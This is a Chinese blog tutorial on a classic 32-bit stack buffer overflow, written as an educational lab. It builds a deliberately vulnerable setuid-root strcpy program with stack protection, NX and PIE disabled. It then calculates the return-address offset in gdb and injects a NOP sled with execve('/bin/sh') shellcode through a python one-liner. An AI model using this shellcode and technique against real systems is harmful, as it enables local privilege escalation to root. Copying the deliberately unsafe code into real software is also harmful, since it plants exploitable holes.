PWN学习---1、基本漏洞-缓冲区溢出

最新推荐文章于 2024-07-08 12:28:19 发布
最新推荐文章于 2024-07-08 12:28:19 发布
阅读量472 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42766694/article/details/115857228
版权

环境:Ubuntu12.04 32位
一、存在漏洞代码

//vuln.c 
#include <stdio.h> 
#include <string.h> 
int main(int argc,char * argv [])
{ 
        /* [1] */ char buf [256]; 
        /* [2] */ strcpy(buf,argv [1]); 
        /* [3] */ printf("input:%s \n",buf);
        return 0; 
}

编译命令:
(关闭栈保护,NX)

$ gcc -g -fno-stack-protector -z execstack -o vuln vuln.c --no-pie   //关闭栈保护和NX保护和PIE保护
$ sudo chown root vuln 
$ sudo chgrp root vuln 
$ sudo chmod +s vuln

二、代码堆栈布局

(gdb) disassemble main
Dump of assembler code for function main:
   0x08048414 <+0>:	push   %ebp            //把调用函数的ebp入栈
   0x08048415 <+1>:	mov    %esp,%ebp      // 把当前栈顶设置为被调用函数的ebp
   0x08048417 <+3>:	and    $0xfffffff0,%esp   //堆栈对齐(会产生一部分空闲空间)
   0x0804841a <+6>:	sub    $0x110,%esp      //为mian函数的局部变量留出空间
   0x08048420 <+12>:	mov    0xc(%ebp),%eax   //eax=argv 
   0x08048423 <+15>:	add    $0x4,%eax        //eax=&argv[1]
   0x08048426 <+18>:	mov    (%eax),%eax      //eax=argv[1]
   0x08048428 <+20>:	mov    %eax,0x4(%esp)   //strcpy第二个参数入栈
   0x0804842c <+24>:	lea    0x10(%esp),%eax   //eax=”buf”的地址
   0x08048430 <+28>:	mov    %eax,(%esp)      //strcpy第一个参数入栈
   0x08048433 <+31>:	call   0x8048330 <strcpy@plt>//调用strcpy
   0x08048438 <+36>:	mov    $0x8048530,%eax   //eax="input:%s \n"
   0x0804843d <+41>:	lea    0x10(%esp),%edx    //edx=”buf”的地址
   0x08048441 <+45>:	mov    %edx,0x4(%esp)    //printf第二个参数入栈,即buf的地址
   0x08048445 <+49>:	mov    %eax,(%esp)    //printf第一个参数入栈,即输出字符串
   0x08048448 <+52>:	call   0x8048320 <printf@plt>   //调用printf
   0x0804844d <+57>:	mov    $0x0,%eax     //返回0
   0x08048452 <+62>:	leave   //mov epb,esp;pop ebp;
   0x08048453 <+63>:	ret    //return 
End of assembler dump.

在这里插入图片描述
三、测试
1.大概测试

r `python -c 'print "A"*300'`

在这里插入图片描述
返回地址被覆盖
2.计算输入数据与目标返回地址的距离
返回地址位于buf的偏移量0x10c处
0x10c=0x100(buf大小)+0x8(对齐空间)+0x4(调用函数的ebp)

所以用268个A覆盖返回地址之前的空间,用4个B覆盖返回地址:“A”*268+”B”*4

r `python -c 'print "A"*268+"B"*4'`

在这里插入图片描述
返回地址被BBBB覆盖
四、利用调试
1.shellcode分析
shellcode组成:填充1+shellcode的地址+填充2+shellcode
填充1:“A”*268
Shellcode 的地址:"\x4f\xf2\xff\xbf"
地址的寻找:
在这里插入图片描述
单步运行到main函数的最后一步,观察esp的值,此时esp处于main函数的栈顶,指向返回地址。所以shellcode的地址比esp的内容稍大一些,可以选择一个大概的地址,填充一些NOP指令使其跳到shellcode。
填充2:"\x90\x90\x90\x90\x90\x90\x90"
Shellcode:"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"

  "\x31\xc0"             /* xorl    %eax,%eax              */
  "\x50"                 /* pushl   %eax                   */
  "\x68""//sh"           /* pushl   $0x68732f2f            */
  "\x68""/bin"           /* pushl   $0x6e69622f            */
  "\x89\xe3"             /* movl    %esp,%ebx              */
  "\x50"                 /* pushl   %eax                   */
  "\x53"                 /* pushl   %ebx                   */
  "\x89\xe1"             /* movl    %esp,%ecx              */
  "\x99"                 /* cdq                            */
  "\xb0\x0b"             /* movb    $0x0b,%al              */
  "\xcd\x80"             /* int     $0x80                  */

2.gdb调试
(1)gdb添加-tui选项,避免花屏
在这里插入图片描述
(2)代码源码及汇编代码可视化
在这里插入图片描述
(3)寄存器可视化
在这里插入图片描述
(4)下断点
在这里插入图片描述
(5)输入shellcode,运行调试

$ r `python -c 'print "A"*268+"\x4f\xf2\xff\xbf\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`

停在断点处
在这里插入图片描述
(6)单步步过
在这里插入图片描述
直到最后一步”ret”,此时main函数的ebp已经从栈中弹出,可以看到ebp已经被覆盖
在这里插入图片描述
执行完”ret”,可以看到eip已经替换成shellcode的地址

(7)成功写入
执行一些NOP指令后,程序跳到shellcode处,此时观察汇编指令,可以看到shellcode已经成功写入并可以执行
在这里插入图片描述
例如:“int 0x80”
在这里插入图片描述

美丽漂亮可爱小仙狗
关注
pwn入门:sploitfun-典型的基于堆栈的缓冲区溢出详解
EternalBurning的博客
04-12 1734
虚拟机环境:Ubuntu 14.04(x86) 本文是基于sploitfun系列教程的详细解析,sploitfun对于纯新手而言,其中有些东西还是不够详细,新手不能很好的接触到其中原理,故作此文进行补充 编译代码第一行,表示关闭ASLR(地址空间布局随机化)。kernel.randomize_va_space堆栈地址随机初始化,很好理解,就是在每次将程序加载到内存时,进程地址空间的...
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1130
off-by-one 漏洞 前置学习pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
9.pwn 栈溢出(基本ROP)
最新发布
2301_80361487的博客
07-08 1127
函数中的存储在栈中的局部变量数组边界检查不严格发生越界写,造成用户输入覆盖到缓冲区外的数据内容,由于栈中同时存在着与函数调用参数的相关信息,栈溢出可以导致控制流劫持。
pwn入门之二:缓冲溢出
jhycjhyc的专栏
10-23 924
pwn入门二:缓冲溢出     环境:cenos6.5 64位,安装了 gcc的32位编译库,cenos运行于文本模式,搭建方法见博文《pwn入门之一:搭建64位centos6.5虚拟机 》。   一、建立 test1.c,内容如下: #include &lt;stdio.h&gt; main() {   char a='a';   char b[10];   gets(b)...
pwn入门(3):缓冲区溢出ROP攻击(ret2syscall+ret2libc)
Bossfrank的博客
04-18 1393
本节通过两个实例ret2tsyscall、ret2libc1,非常详细地为读者介绍基本的ROP攻击过程。对函数的调用、传参、返回的过程以及系统调用过程中对寄存器的赋值进行了详细阐释。
cpu缓冲区大小怎么设置_pwn入门:sploitfun-典型的基于堆栈的缓冲区溢出详解
weixin_39957068的博客
11-21 243
虚拟机环境:Ubuntu 14.04(x86)本文是基于sploitfun系列教程的详细解析,sploitfun对于纯新手而言,其中有些东西还是不够详细,新手不能很好的接触到其中原理,故作此文进行补充编译代码第一行,表示关闭ASLR(地址空间布局随机化)。kernel.randomize_va_space堆栈地址随机初始化,很好理解,就是在每次将程序加载到内存时,进程地址空间的堆栈起始地址都不一样...
5m21d缓冲区溢出pwn笔记
whatiwhere的博客
05-24 820
mysql链接字符串函数 - concat(str1,str2) - concat_ws(separator,str1,str2….) - group_concat(str1,str2….) - mysql的concat函数可以连接一个或者多个字符串 - concat(username,0x23,password,0x23…..) - concat_ws()函数,表示conc...
PWN入门第一节(缓冲区溢出之栈溢出上篇)
xiaobai的博客
06-23 774
0x10 本期简介 在计算机安全领域,缓冲区溢出是个古老而经典的话题。众所周知,计算机程序的运行依赖于函数调用栈。栈溢出是指在栈内写入超出长度限制的数据,从而破坏程序运行甚至获得系统控制权的攻击手段。本文将以32位x86架构下的程序为例讲解栈溢出的技术详情。 为了实现栈溢出,要满足两个条件。第一,程序要有向栈内写入数据的行为;第二,程序并不限制写入数据的长度。历史上第一例被广泛注意的“莫里斯蠕虫”病毒就是利用C语言标准库的 gets() 函数并未限制输入数据长度的漏洞,从而实现了栈溢出。 Fig 1. 波士
PWN-整数溢出
山高路远
04-06 962
整数溢出 基础知识 数据类型以及所取的范围(环境为64位下使用gcc-5.4) 类型 字节 范围 short int 2byte(word) 0~32767(0~0x7fff) -32768~-1(0x8000~0xffff) unsigned short int 2byte(word) 0~65535(0~0xffff) int 4byte(dword) 0~2147483647(0~0x7fffffff) -2147483648~-1(0x80000000~0xfffffff
PWN-Challenges
03-17
PWN挑战通常包括了缓冲区溢出、格式字符串漏洞、整数溢出、栈溢出、堆溢出等各种类型的安全漏洞利用。在Python编程语言中,虽然它相对安全,但仍然可以构建出PWN挑战来测试和提升安全研究人员的技能。 "Python"作为...
pwn栈溢出10道练习题有writeup
01-04
pwn栈溢出练习题目,每题都有writeup.
Python库 | pwn-machine-1.1.tar.gz
03-11
5. **栈和堆操作**:对于缓冲区溢出漏洞的利用,这个库可能包含用于操纵栈和堆的函数。 6. ** shellcode**:可能包含预编译的shellcode模板,方便开发者构建自定义的攻击payload。 7. **模糊测试**:可能提供模糊...
PWN入门第二节(缓冲区溢出之栈溢出下)
xiaobai的博客
06-23 278
0x10 上期回顾 上篇文章介绍了栈溢出的原理和两种执行方法,两种方法都是通过覆盖返回地址来执行输入的指令片段(shellcode)或者动态库中的函数(return2libc)。本篇会继续介绍另外两种实现方法。一种是覆盖返回地址来执行内存内已有的代码片段(ROP),另一种是将某个函数的地址替换成另一个函数的地址(hijack GOT)。 0x20 相关知识 0x21 寄存器 在上篇的背景知识中,我们提到了函数状态相关的三个寄存器--esp,ebp,eip。下面的内容会涉及更多的寄存器,所以我们大致介绍下寄存
缓冲区溢出攻击实践
热门推荐
海枫的专栏
01-30 2万+
缓冲区溢出攻击方法是黑客入门的基础,本文以一个具体的实例一步步介绍如何进行最初级的缓冲区溢出攻击。
PWN】简单缓存区溢出
HAPPY
08-23 845
【解法】 拿到文件,查看伪代码,发现v4变量的地址是 -50h (也就是-80)  那么要想覆盖到key变量的地址,我们就得用ida分析获取输入的地址和key地址的相对差值了。。  得到v4的地址为-80,v5的地址为-4,-4-(-80)得到需要覆盖的字节为76 直接用python生成字符串提交得到flag。。  [学习资料] https://blog.csdn.net/u0...
PWN入门(2)栈溢出基础
农夫果园好好喝的博客
06-29 863
PWN栈溢出基础。
从0到1理解文件包含 缓冲区溢出 原理与利用--打靶手记之hackmyvm Registry
milu_Sec的博客
02-16 1007
虽然ASLR使得地址随机化,但由于地址空间有限,libc地址还是会重复(0xf7cfe000),这里循环查看new程序的动态库依赖,并用grep过滤出包含地址0xf7cfe000的行,这里看到该地址会重复出现,有了这个地址以后,我们可以多次尝试利用,直到libc加载到这个重复的地址时,就可以成功利用了。攻击者通过精心构造输入数据,可以改变程序的控制流程,执行恶意代码。:当程序将数据写入一个固定大小的缓冲区(如栈上的局部字符数组)时,如果写入的数据量超过了缓冲区的容量,多出的数据将溢出到相邻的内存区域。
pwn入门(2):ROP攻击的原理,缓冲区溢出漏洞利用(ret2text+ret2shellcode)
Bossfrank的博客
04-18 3853
本节将介绍基本的ROP(Return-Oriented Programming,返回导向编程的)的攻击原理、二进制程序的保护机制,并通过两个实例ret2text、ret2shellcode,为读者简介基本的ROP攻击过程。本节所使用的实例可在CTF wiki上进行下载。
缓冲区溢出攻击实验(二)
Venscor技术养成之路
11-19 2754
上面缓冲区溢出攻击实验(一)中,主要阐述了怎么获得函数的返回地址,以及怎么修改返回地址。接下来阐述,获得了返回地址要做啥,也就是我们的获得shell的恶意程序; 二、获取shell恶意程序         由于我们最终是要通过向数组里面写超过范围的数据造成缓冲区溢出来,从而执行任意代码;而且我们的获得shell的程序会作为数据的一部分;至于为什么要作为程序的一部分,这里简单说明:一个程序只能访
深入学习缓冲区溢出攻防实战
"Q版缓冲区溢出教程由王炜原著,经整理者破船整理成文档,旨在方便学习者理解缓冲区溢出概念并提供学习资料。文档指出,缓冲区溢出是普遍且危险的漏洞,可能导致程序崩溃、系统不稳定甚至权限提升。作者分享了自己...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值